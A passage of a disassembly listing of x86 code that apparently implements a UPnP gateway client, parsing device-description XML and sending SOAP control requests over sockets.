mov [esi+8], eax
jb short loc_9B446A
jmp short loc_9B4509
; ---------------------------------------------------------------------------
loc_9B448A: ; CODE XREF: sub_9B43AF+CF�j
cmp byte ptr [eax], 3Ch
jz short loc_9B44FC
loc_9B448F: ; CODE XREF: sub_9B43AF+EE�j
inc edi
inc eax
cmp eax, ecx
mov [esi+8], eax
jnb short loc_9B4509
mov edx, eax
cmp byte ptr [edx], 3Ch
jnz short loc_9B448F
test edi, edi
jle short loc_9B44FC
mov eax, [esi+1Ch]
test eax, eax
jz short loc_9B44FC
push edi
push ebx
push dword ptr [esi+10h]
call eax
add esp, 0Ch
jmp short loc_9B44FC
; ---------------------------------------------------------------------------
loc_9B44B6: ; CODE XREF: sub_9B43AF+36�j
; sub_9B43AF+7F�j
mov eax, [esi+8]
cmp byte ptr [eax], 2Fh
jnz short loc_9B44FC
mov ecx, [esi+4]
xor edx, edx
inc eax
cmp eax, ecx
mov [esi+8], eax
mov edi, eax
jnb short loc_9B4509
cmp byte ptr [eax], 3Eh
jz short loc_9B44E2
loc_9B44D2: ; CODE XREF: sub_9B43AF+131�j
inc edx
inc eax
cmp eax, ecx
mov [esi+8], eax
jnb short loc_9B4509
mov ebx, eax
cmp byte ptr [ebx], 3Eh
jnz short loc_9B44D2
loc_9B44E2: ; CODE XREF: sub_9B43AF+121�j
mov eax, [esi+18h]
test eax, eax
jz short loc_9B44F3
push edx
push edi
push dword ptr [esi+10h]
call eax
add esp, 0Ch
loc_9B44F3: ; CODE XREF: sub_9B43AF+138�j
inc dword ptr [esi+8]
jmp short loc_9B44FC
; ---------------------------------------------------------------------------
loc_9B44F8: ; CODE XREF: sub_9B43AF+1A�j
; sub_9B43AF+26�j
inc ecx
mov [esi+8], ecx
loc_9B44FC: ; CODE XREF: sub_9B43AF+AB�j
; sub_9B43AF+DE�j ...
mov eax, [esi+4]
dec eax
cmp [esi+8], eax
jb loc_9B43C3
loc_9B4509: ; CODE XREF: sub_9B43AF+62�j
; sub_9B43AF+9F�j ...
pop edi
pop ebx
loc_9B450B: ; CODE XREF: sub_9B43AF+C�j
pop esi
retn
sub_9B43AF endp
; =============== S U B R O U T I N E =======================================
sub_9B450D proc near ; CODE XREF: sub_9B47E9+35�p
; sub_9B517D+34�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, [eax]
mov edx, [eax+0Ch]
add edx, ecx
push eax
mov [eax+8], ecx
mov [eax+4], edx
call sub_9B43AF
pop ecx
retn
sub_9B450D endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B4526(void *Dst, void *Buf1, size_t Size)
sub_9B4526 proc near ; DATA XREF: sub_9B47E9+20�o
Dst = dword ptr 4
Buf1 = dword ptr 8
Size = dword ptr 0Ch
push ebx
push esi
mov esi, [esp+8+Dst]
push edi
mov edi, [esp+0Ch+Size]
push edi ; Size
push [esp+10h+Buf1] ; Src
push esi ; Dst
call memcpy
xor bl, bl
add esp, 0Ch
mov [esi+edi], bl
inc dword ptr [esi+100h]
cmp edi, 7
jnz short loc_9B457D
push edi ; Size
push offset aService ; "service"
push [esp+14h+Buf1] ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9B457D
mov [esi+504h], bl
mov [esi+584h], bl
mov [esi+604h], bl
mov [esi+684h], bl
loc_9B457D: ; CODE XREF: sub_9B4526+27�j
; sub_9B4526+3D�j
pop edi
pop esi
pop ebx
retn
sub_9B4526 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B4581(int, void *Buf1, int)
sub_9B4581 proc near ; DATA XREF: sub_9B47E9+27�o
arg_0 = dword ptr 4
Buf1 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
dec dword ptr [esi+100h]
cmp [esp+4+arg_8], 7
jnz loc_9B468A
push 7 ; Size
push offset aService ; "service"
push [esp+0Ch+Buf1] ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz loc_9B468A
push ebx
push edi
lea ebx, [esi+684h]
push offset aUrnSchemasUpnp ; "urn:schemas-upnp-org:service:WANCommonI"...
push ebx ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B4614
mov edi, 80h
push edi ; Size
lea eax, [esi+504h]
push eax ; Src
lea eax, [esi+104h]
push eax ; Dst
call memcpy
push edi ; Size
lea eax, [esi+584h]
push eax ; Src
lea eax, [esi+184h]
push eax ; Dst
call memcpy
push edi ; Size
lea eax, [esi+604h]
push eax ; Src
lea eax, [esi+204h]
push eax ; Dst
call memcpy
add esi, 284h
jmp short loc_9B467D
; ---------------------------------------------------------------------------
loc_9B4614: ; CODE XREF: sub_9B4581+48�j
push offset aUrnSchemasUp_1 ; "urn:schemas-upnp-org:service:WANIPConne"...
push ebx ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_9B4636
push offset aUrnSchemasUp_2 ; "urn:schemas-upnp-org:service:WANPPPConn"...
push ebx ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B4688
loc_9B4636: ; CODE XREF: sub_9B4581+A2�j
mov edi, 80h
push edi ; Size
lea eax, [esi+504h]
push eax ; Src
lea eax, [esi+304h]
push eax ; Dst
call memcpy
push edi ; Size
lea eax, [esi+584h]
push eax ; Src
lea eax, [esi+384h]
push eax ; Dst
call memcpy
push edi ; Size
lea eax, [esi+604h]
push eax ; Src
lea eax, [esi+404h]
push eax ; Dst
call memcpy
add esi, 484h
loc_9B467D: ; CODE XREF: sub_9B4581+91�j
push edi ; Size
push ebx ; Src
push esi ; Dst
call memcpy
add esp, 30h
loc_9B4688: ; CODE XREF: sub_9B4581+B3�j
pop edi
pop ebx
loc_9B468A: ; CODE XREF: sub_9B4581+10�j
; sub_9B4581+2B�j
pop esi
retn
sub_9B4581 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B468C(char *Str1, void *Src, size_t Size)
sub_9B468C proc near ; DATA XREF: sub_9B47E9+2E�o
Str1 = dword ptr 4
Src = dword ptr 8
Size = dword ptr 0Ch
push esi
mov esi, [esp+4+Str1]
push offset aUrlbase ; "URLBase"
push esi ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B46AA
add esi, 80h
jmp short loc_9B470C
; ---------------------------------------------------------------------------
loc_9B46AA: ; CODE XREF: sub_9B468C+14�j
push offset aServicetype ; "serviceType"
push esi ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B46C3
add esi, 684h
jmp short loc_9B470C
; ---------------------------------------------------------------------------
loc_9B46C3: ; CODE XREF: sub_9B468C+2D�j
push offset aControlurl ; "controlURL"
push esi ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B46DC
add esi, 504h
jmp short loc_9B470C
; ---------------------------------------------------------------------------
loc_9B46DC: ; CODE XREF: sub_9B468C+46�j
push offset aEventsuburl ; "eventSubURL"
push esi ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B46F5
add esi, 584h
jmp short loc_9B470C
; ---------------------------------------------------------------------------
loc_9B46F5: ; CODE XREF: sub_9B468C+5F�j
push offset aScpdurl ; "SCPDURL"
push esi ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B4733
add esi, 604h
loc_9B470C: ; CODE XREF: sub_9B468C+1C�j
; sub_9B468C+35�j ...
test esi, esi
jz short loc_9B4733
push edi
mov edi, [esp+8+Size]
cmp edi, 80h
jl short loc_9B4720
push 7Fh
pop edi
loc_9B4720: ; CODE XREF: sub_9B468C+8F�j
push edi ; Size
push [esp+0Ch+Src] ; Src
push esi ; Dst
call memcpy
add esp, 0Ch
mov byte ptr [esi+edi], 0
pop edi
loc_9B4733: ; CODE XREF: sub_9B468C+78�j
; sub_9B468C+82�j
pop esi
retn
sub_9B468C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B4735(SOCKET s, int, int, int len, int, char *Str)
sub_9B4735 proc near ; CODE XREF: sub_9B4C5A+1A9�p
Src = byte ptr -208h
Dest = byte ptr -8
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
len = dword ptr 14h
arg_10 = dword ptr 18h
Str = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 208h
push ebx
push esi
push edi
push [ebp+Str] ; Str
call strlen
cmp word ptr [ebp+len], 50h
mov esi, _snprintf
pop ecx
mov ebx, eax
mov [ebp+Dest], 0
jz short loc_9B4772
movzx eax, word ptr [ebp+len]
push eax
push offset aHu ; ":%hu"
lea eax, [ebp+Dest]
push 8 ; Count
push eax ; Dest
call esi ; _snprintf
add esp, 10h
loc_9B4772: ; CODE XREF: sub_9B4735+26�j
push [ebp+arg_10]
lea eax, [ebp+Dest]
push ebx
push eax
push [ebp+arg_8]
lea eax, [ebp+Src]
push [ebp+arg_4]
push offset aPostSHttp1_1Ho ; "POST %s HTTP/1.1\r\nHost: %s%s\r\nUser-Agen"...
push 200h ; Count
push eax ; Dest
call esi ; _snprintf
mov edi, eax
lea eax, [edi+ebx]
push eax ; Size
mov [ebp+len], eax
call malloc
mov esi, eax
add esp, 24h
test esi, esi
jz short loc_9B47E4
push edi ; Size
lea eax, [ebp+Src]
push eax ; Src
push esi ; Dst
call memcpy
push ebx ; Size
push [ebp+Str] ; Src
lea eax, [esi+edi]
push eax ; Dst
call memcpy
add esp, 18h
push 0 ; flags
push [ebp+len] ; len
push esi ; buf
push [ebp+s] ; s
call send
push esi ; Memory
mov edi, eax
call free
pop ecx
mov eax, edi
loc_9B47E4: ; CODE XREF: sub_9B4735+74�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B4735 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B47E9 proc near ; CODE XREF: sub_9B4B6B+65�p
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_0]
and [ebp+var_4], 0
mov [ebp+var_24], eax
mov eax, [ebp+arg_4]
mov [ebp+var_18], eax
mov eax, [ebp+arg_8]
mov [ebp+var_14], eax
lea eax, [ebp+var_24]
push eax
mov [ebp+var_10], offset sub_9B4526
mov [ebp+var_C], offset sub_9B4581
mov [ebp+var_8], offset sub_9B468C
call sub_9B450D
pop ecx
leave
retn
sub_9B47E9 endp
; =============== S U B R O U T I N E =======================================
sub_9B4826 proc near ; CODE XREF: sub_9B4C5A+219�p
push ebx
push esi
push edi
mov edi, eax
mov esi, offset aContentLength ; "content-length"
xor eax, eax
loc_9B4832: ; CODE XREF: sub_9B4826+2B�j
test edi, edi
jz short loc_9B485C
mov dl, [esi]
mov bl, [ecx]
cmp dl, bl
jz short loc_9B484B
movsx ebx, bl
movsx edx, dl
add ebx, 20h
cmp edx, ebx
jnz short loc_9B485C
loc_9B484B: ; CODE XREF: sub_9B4826+16�j
inc ecx
inc esi
dec edi
cmp byte ptr [esi], 0
jnz short loc_9B4832
test edi, edi
jz short loc_9B485C
cmp byte ptr [ecx], 3Ah
jz short loc_9B4867
loc_9B485C: ; CODE XREF: sub_9B4826+E�j
; sub_9B4826+23�j ...
or eax, 0FFFFFFFFh
loc_9B485F: ; CODE XREF: sub_9B4826+4D�j
; sub_9B4826+66�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_9B4863: ; CODE XREF: sub_9B4826+46�j
test edi, edi
jz short loc_9B485C
loc_9B4867: ; CODE XREF: sub_9B4826+34�j
inc ecx
dec edi
cmp byte ptr [ecx], 20h
jz short loc_9B4863
jmp short loc_9B4885
; ---------------------------------------------------------------------------
loc_9B4870: ; CODE XREF: sub_9B4826+64�j
cmp dl, 39h
jg short loc_9B485F
test edi, edi
jz short loc_9B485C
movsx edx, dl
lea eax, [eax+eax*4]
inc ecx
lea eax, [edx+eax*2-30h]
dec edi
loc_9B4885: ; CODE XREF: sub_9B4826+48�j
mov dl, [ecx]
cmp dl, 30h
jge short loc_9B4870
jmp short loc_9B485F
sub_9B4826 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B488E proc near ; CODE XREF: sub_9B4EE4+19C�p
var_8 = dword ptr -8
Buf1 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
xor edi, edi
xor esi, esi
xor edx, edx
cmp [ebp+arg_0], edi
jle loc_9B4930
loc_9B48A4: ; CODE XREF: sub_9B488E+9C�j
lea eax, [esi+1]
mov cl, [ebx+eax-1]
cmp cl, 0Ah
mov [ebp+var_8], eax
jz short loc_9B48C5
cmp cl, 0Dh
jz short loc_9B48C5
cmp cl, 3Ah
jnz short loc_9B4925
test edi, edi
jnz short loc_9B4925
mov edi, esi
jmp short loc_9B4925
; ---------------------------------------------------------------------------
loc_9B48C5: ; CODE XREF: sub_9B488E+23�j
; sub_9B488E+28�j
test edi, edi
jz short loc_9B4923
loc_9B48C9: ; CODE XREF: sub_9B488E+40�j
inc edi
cmp byte ptr [edi+ebx], 20h
jz short loc_9B48C9
push 8 ; Size
lea eax, [edx+ebx]
push offset aLocation ; "location"
push eax ; Buf1
mov [ebp+Buf1], eax
call _memicmp
add esp, 0Ch
test eax, eax
jnz short loc_9B48F8
mov ecx, [ebp+arg_4]
lea eax, [edi+ebx]
mov [ecx], eax
mov eax, [ebp+arg_8]
jmp short loc_9B491A
; ---------------------------------------------------------------------------
loc_9B48F8: ; CODE XREF: sub_9B488E+5B�j
push 2 ; Size
push offset aSt ; "st"
push [ebp+Buf1] ; Buf1
call _memicmp
add esp, 0Ch
test eax, eax
jnz short loc_9B491E
mov ecx, [ebp+arg_C]
lea eax, [edi+ebx]
mov [ecx], eax
mov eax, [ebp+arg_10]
loc_9B491A: ; CODE XREF: sub_9B488E+68�j
sub esi, edi
mov [eax], esi
loc_9B491E: ; CODE XREF: sub_9B488E+7F�j
mov eax, [ebp+var_8]
xor edi, edi
loc_9B4923: ; CODE XREF: sub_9B488E+39�j
mov edx, eax
loc_9B4925: ; CODE XREF: sub_9B488E+2D�j
; sub_9B488E+31�j ...
mov esi, eax
cmp esi, [ebp+arg_0]
jl loc_9B48A4
loc_9B4930: ; CODE XREF: sub_9B488E+10�j
pop edi
pop esi
leave
retn
sub_9B488E endp
; =============== S U B R O U T I N E =======================================
sub_9B4934 proc near ; CODE XREF: sub_9B498C+E0�p
; sub_9B498C+ED�p ...
cmp byte ptr [esi], 68h
push edi
mov edi, eax
jnz short loc_9B4965
cmp byte ptr [esi+1], 74h
jnz short loc_9B4965
cmp byte ptr [esi+2], 74h
jnz short loc_9B4965
cmp byte ptr [esi+3], 70h
jnz short loc_9B4965
cmp byte ptr [esi+4], 3Ah
jnz short loc_9B4965
cmp byte ptr [esi+5], 2Fh
jnz short loc_9B4965
cmp byte ptr [esi+6], 2Fh
jnz short loc_9B4965
push edi
push esi
push ebx
jmp short loc_9B4981
; ---------------------------------------------------------------------------
loc_9B4965: ; CODE XREF: sub_9B4934+6�j
; sub_9B4934+C�j ...
push ebx ; Str
call strlen
cmp byte ptr [esi], 2Fh
pop ecx
jz short loc_9B4976
mov byte ptr [eax+ebx], 2Fh
inc eax
loc_9B4976: ; CODE XREF: sub_9B4934+3B�j
cmp eax, edi
jg short loc_9B498A
sub edi, eax
push edi ; Count
push esi ; Source
add eax, ebx
push eax ; Dest
loc_9B4981: ; CODE XREF: sub_9B4934+2F�j
call strncpy
add esp, 0Ch
loc_9B498A: ; CODE XREF: sub_9B4934+44�j
pop edi
retn
sub_9B4934 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B498C(int, size_t Count, char *Source)
sub_9B498C proc near ; CODE XREF: sub_9B4B6B+96�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Count = dword ptr 0Ch
Source = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov edi, [ebp+Count]
lea eax, [edi+80h]
push eax ; Str
mov [ebp+var_8], eax
call strlen
mov esi, eax
test esi, esi
pop ecx
jnz short loc_9B49B9
push [ebp+Source] ; Str
call strlen
pop ecx
mov esi, eax
loc_9B49B9: ; CODE XREF: sub_9B498C+20�j
lea eax, [edi+404h]
inc esi
inc esi
push eax ; Str
mov [ebp+Count], esi
mov [ebp+var_4], esi
mov [ebp+var_C], eax
call strlen
add esi, eax
lea eax, [edi+304h]
push eax ; Str
mov [ebp+var_10], eax
call strlen
add [ebp+Count], eax
add edi, 104h
push edi ; Str
mov [ebp+var_14], edi
call strlen
mov ebx, malloc
add [ebp+var_4], eax
mov edi, [ebp+arg_0]
push esi ; Size
call ebx ; malloc
push [ebp+Count] ; Size
mov [edi+4], eax
call ebx ; malloc
push [ebp+var_4] ; Size
mov [edi], eax
call ebx ; malloc
mov ebx, strncpy
mov [edi+8], eax
mov eax, [ebp+var_8]
add esp, 18h
cmp byte ptr [eax], 0
push esi ; Count
jz short loc_9B4A29
push eax
jmp short loc_9B4A2C
; ---------------------------------------------------------------------------
loc_9B4A29: ; CODE XREF: sub_9B498C+98�j
push [ebp+Source] ; Source
loc_9B4A2C: ; CODE XREF: sub_9B498C+9B�j
push dword ptr [edi+4] ; Dest
call ebx ; strncpy
mov eax, [edi+4]
add esp, 0Ch
add eax, 7
push 2Fh ; Val
push eax ; Str
call strchr
test eax, eax
pop ecx
pop ecx
jz short loc_9B4A4C
mov byte ptr [eax], 0
loc_9B4A4C: ; CODE XREF: sub_9B498C+BB�j
push [ebp+Count] ; Count
push dword ptr [edi+4] ; Source
push dword ptr [edi] ; Dest
call ebx ; strncpy
push [ebp+var_4] ; Count
push dword ptr [edi+4] ; Source
push dword ptr [edi+8] ; Dest
call ebx ; strncpy
mov ebx, [edi+4]
mov eax, esi
mov esi, [ebp+var_C]
add esp, 18h
call sub_9B4934
mov eax, [ebp+Count]
mov esi, [ebp+var_10]
mov ebx, [edi]
call sub_9B4934
mov eax, [ebp+var_4]
mov esi, [ebp+var_14]
mov ebx, [edi+8]
call sub_9B4934
pop edi
pop esi
pop ebx
leave
retn
sub_9B498C endp
; =============== S U B R O U T I N E =======================================
sub_9B4A91 proc near ; CODE XREF: sub_9B4B6B+B6�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_9B4ABE
push edi
push dword ptr [esi] ; Memory
mov edi, free
call edi ; free
push dword ptr [esi+4] ; Memory
and dword ptr [esi], 0
call edi ; free
push dword ptr [esi+8] ; Memory
and dword ptr [esi+4], 0
call edi ; free
add esp, 0Ch
and dword ptr [esi+8], 0
pop edi
loc_9B4ABE: ; CODE XREF: sub_9B4A91+7�j
pop esi
retn
sub_9B4A91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B4AC0(SOCKET s, char *buf, int len, int)
sub_9B4AC0 proc near ; CODE XREF: sub_9B3F00:loc_9B40E1�p
; sub_9B4C5A+268�p ...
readfds = fd_set ptr -10Ch
timeout = timeval ptr -8
s = dword ptr 8
buf = dword ptr 0Ch
len = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10Ch
mov eax, [ebp+arg_C]
cdq
mov ecx, 3E8h
idiv ecx
push esi
mov esi, [ebp+s]
mov [ebp+readfds.fd_array], esi
mov [ebp+readfds.fd_count], 1
mov [ebp+timeout.tv_sec], eax
imul edx, 3E8h
lea eax, [ebp+timeout]
push eax ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea eax, [ebp+readfds]
push eax ; readfds
push 40h ; nfds
mov [ebp+timeout.tv_usec], edx
call select
test eax, eax
jge short loc_9B4B14
or eax, 0FFFFFFFFh
jmp short loc_9B4B29
; ---------------------------------------------------------------------------
loc_9B4B14: ; CODE XREF: sub_9B4AC0+4D�j
jnz short loc_9B4B1A
xor eax, eax
jmp short loc_9B4B29
; ---------------------------------------------------------------------------
loc_9B4B1A: ; CODE XREF: sub_9B4AC0:loc_9B4B14�j
push 0 ; flags
push [ebp+len] ; len
push [ebp+buf] ; buf
push esi ; s
call recv
loc_9B4B29: ; CODE XREF: sub_9B4AC0+52�j
; sub_9B4AC0+58�j
pop esi
leave
retn
sub_9B4AC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B4B2C proc near ; CODE XREF: sub_9B4B6B+A8�p
Source = byte ptr -40h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40h
push 0 ; Dest
lea eax, [ebp+arg_4]
push eax ; int
lea eax, [ebp+Source]
push eax ; Source
mov eax, [ebp+arg_4]
add eax, 484h
push eax ; int
mov eax, [ebp+arg_0]
push dword ptr [eax] ; Str
mov [ebp+Source], 0
call sub_9B5214
lea eax, [ebp+Source]
push eax ; Str2
push offset aConnected ; "Connected"
call strcmp
add esp, 1Ch
neg eax
sbb eax, eax
inc eax
leave
retn
sub_9B4B2C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B4B6B(int, int, void *Count, int netshort, int)
sub_9B4B6B proc near ; CODE XREF: sub_9A90FF+64�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Count = dword ptr 10h
netshort = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
cmp [ebp+arg_0], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
jnz short loc_9B4B80
leave
retn
; ---------------------------------------------------------------------------
loc_9B4B80: ; CODE XREF: sub_9B4B6B+11�j
push esi
mov esi, [ebp+Count]
push ebx
mov [ebp+var_4], 1
push edi
loc_9B4B8D: ; CODE XREF: sub_9B4B6B+DD�j
mov edi, [ebp+arg_0]
loc_9B4B90: ; CODE XREF: sub_9B4B6B+D0�j
push [ebp+arg_10] ; Count
lea eax, [ebp+var_C]
push [ebp+netshort] ; netshort
push eax ; int
push dword ptr [edi+4] ; Str
call sub_9B4207
mov ebx, eax
add esp, 10h
test ebx, ebx
jz loc_9B4C37
inc [ebp+var_8]
push 704h ; Size
push 0 ; Val
push esi ; Dst
call memset
push 0Ch ; Size
push 0 ; Val
push [ebp+arg_4] ; Dst
call memset
push esi
push [ebp+var_C]
push ebx
call sub_9B47E9
push ebx ; Memory
call free
lea eax, [esi+284h]
push offset aUrnSchemasUpnp ; "urn:schemas-upnp-org:service:WANCommonI"...
push eax ; Str1
call strcmp
add esp, 30h
test eax, eax
jz short loc_9B4BFA
cmp [ebp+var_4], 3
jl short loc_9B4C27
loc_9B4BFA: ; CODE XREF: sub_9B4B6B+87�j
push dword ptr [edi+4] ; Source
push esi ; Count
push [ebp+arg_4] ; int
call sub_9B498C
add esp, 0Ch
cmp [ebp+var_4], 2
jge short loc_9B4C55
push esi
push [ebp+arg_4]
call sub_9B4B2C
test eax, eax
pop ecx
pop ecx
jnz short loc_9B4C55
push [ebp+arg_4]
call sub_9B4A91
pop ecx
loc_9B4C27: ; CODE XREF: sub_9B4B6B+8D�j
push 704h ; Size
push 0 ; Val
push esi ; Dst
call memset
add esp, 0Ch
loc_9B4C37: ; CODE XREF: sub_9B4B6B+3E�j
mov edi, [edi]
test edi, edi
jnz loc_9B4B90
inc [ebp+var_4]
cmp [ebp+var_4], 3
jle loc_9B4B8D
xor eax, eax
loc_9B4C50: ; CODE XREF: sub_9B4B6B+ED�j
pop edi
pop ebx
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_9B4C55: ; CODE XREF: sub_9B4B6B+A2�j
; sub_9B4B6B+B1�j
mov eax, [ebp+var_4]
jmp short loc_9B4C50
sub_9B4B6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B4C5A(SOCKET s, char *Str, int, int, int, int, int)
sub_9B4C5A proc near ; CODE XREF: sub_9B5214+49�p
; sub_9B5353+52�p ...
var_8F0 = byte ptr -8F0h
Dest = byte ptr -0F0h
cp = byte ptr -70h
name = sockaddr ptr -2Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
buf = dword ptr -0Ch
len = word ptr -8
var_4 = dword ptr -4
s = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 8F0h
and dword ptr [ebp+len], 0
push ebx
mov ebx, [ebp+arg_C]
push esi
mov esi, _snprintf
push edi
push ebx
push [ebp+arg_8]
lea eax, [ebp+Dest]
push offset aSS ; "%s#%s"
push 80h ; Count
push eax ; Dest
call esi ; _snprintf
mov edi, [ebp+arg_10]
add esp, 14h
test edi, edi
lea eax, [ebp+var_8F0]
jnz short loc_9B4CB4
push ebx
push [ebp+arg_8]
push ebx
push offset a?xmlVersion1_0 ; "<?xml version=\"1.0\"?>\r\n<s:Envelope xmln"...
push 800h ; Count
push eax ; Dest
call esi ; _snprintf
add esp, 18h
jmp loc_9B4D6B
; ---------------------------------------------------------------------------
loc_9B4CB4: ; CODE XREF: sub_9B4C5A+3E�j
push [ebp+arg_8]
push ebx
push offset a?xmlVersion1_1 ; "<?xml version=\"1.0\"?>\r\n<s:Envelope xmln"...
push 800h ; Count
push eax ; Dest
call esi ; _snprintf
add esp, 14h
lea eax, [ebp+eax+var_8F0]
jmp short loc_9B4D22
; ---------------------------------------------------------------------------
loc_9B4CD1: ; CODE XREF: sub_9B4C5A+CC�j
lea ecx, [eax+64h]
lea esi, [ebp+Dest]
cmp esi, ecx
jbe short loc_9B4D3E
mov byte ptr [eax], 3Ch
inc eax
mov esi, edx
jmp short loc_9B4CEA
; ---------------------------------------------------------------------------
loc_9B4CE6: ; CODE XREF: sub_9B4C5A+94�j
mov [eax], cl
inc eax
inc esi
loc_9B4CEA: ; CODE XREF: sub_9B4C5A+8A�j
mov cl, [esi]
test cl, cl
jnz short loc_9B4CE6
mov esi, [edi+4]
mov byte ptr [eax], 3Eh
inc eax
test esi, esi
jz short loc_9B4D07
jmp short loc_9B4D01
; ---------------------------------------------------------------------------
loc_9B4CFD: ; CODE XREF: sub_9B4C5A+AB�j
mov [eax], cl
inc eax
inc esi
loc_9B4D01: ; CODE XREF: sub_9B4C5A+A1�j
mov cl, [esi]
test cl, cl
jnz short loc_9B4CFD
loc_9B4D07: ; CODE XREF: sub_9B4C5A+9F�j
mov byte ptr [eax], 3Ch
inc eax
mov byte ptr [eax], 2Fh
inc eax
jmp short loc_9B4D15
; ---------------------------------------------------------------------------
loc_9B4D11: ; CODE XREF: sub_9B4C5A+BF�j
mov [eax], cl
inc eax
inc edx
loc_9B4D15: ; CODE XREF: sub_9B4C5A+B5�j
mov cl, [edx]
test cl, cl
jnz short loc_9B4D11
mov byte ptr [eax], 3Eh
inc eax
add edi, 8
loc_9B4D22: ; CODE XREF: sub_9B4C5A+75�j
mov edx, [edi]
test edx, edx
jnz short loc_9B4CD1
mov cl, [ebx]
mov byte ptr [eax], 3Ch
inc eax
mov byte ptr [eax], 2Fh
inc eax
mov byte ptr [eax], 6Dh
inc eax
mov byte ptr [eax], 3Ah
inc eax
mov edx, ebx
jmp short loc_9B4D4F
; ---------------------------------------------------------------------------
loc_9B4D3E: ; CODE XREF: sub_9B4C5A+82�j
mov eax, [ebp+arg_18]
and dword ptr [eax], 0
jmp loc_9B4DE0
; ---------------------------------------------------------------------------
loc_9B4D49: ; CODE XREF: sub_9B4C5A+F7�j
mov [eax], cl
inc eax
inc edx
mov cl, [edx]
loc_9B4D4F: ; CODE XREF: sub_9B4C5A+E2�j
test cl, cl
jnz short loc_9B4D49
lea ecx, [ebp+Dest]
sub ecx, eax
push ecx ; Count
push offset aSBodySEnvelope ; "></s:Body></s:Envelope>\r\n"
push eax ; Dest
call strncpy
add esp, 0Ch
loc_9B4D6B: ; CODE XREF: sub_9B4C5A+55�j
lea eax, [ebp+var_1C]
push eax ; int
lea eax, [ebp+len]
push eax ; int
lea eax, [ebp+cp]
push eax ; Dest
push [ebp+Str] ; Str
call sub_9B410C
add esp, 10h
test eax, eax
jz short loc_9B4DE0
xor esi, esi
cmp [ebp+s], esi
jge short loc_9B4DE8
push esi ; protocol
push 1 ; type
push 2 ; af
call socket
cmp eax, esi
mov [ebp+s], eax
jl short loc_9B4DDB
push dword ptr [ebp+len] ; netshort
mov [ebp+name.sa_family], 2
call ntohs
mov word ptr [ebp+name.sa_data], ax
lea eax, [ebp+cp]
push eax ; cp
call __imp_inet_addr
mov dword ptr [ebp+name.sa_data+2], eax
push 10h ; namelen
lea eax, [ebp+name]
push eax ; name
push [ebp+s] ; s
call connect
test eax, eax
jge short loc_9B4DE8
push [ebp+s] ; s
call closesocket
loc_9B4DDB: ; CODE XREF: sub_9B4C5A+143�j
mov eax, [ebp+arg_18]
mov [eax], esi
loc_9B4DE0: ; CODE XREF: sub_9B4C5A+EA�j
; sub_9B4C5A+12A�j
or eax, 0FFFFFFFFh
jmp loc_9B4EDF
; ---------------------------------------------------------------------------
loc_9B4DE8: ; CODE XREF: sub_9B4C5A+131�j
; sub_9B4C5A+176�j
lea eax, [ebp+var_8F0]
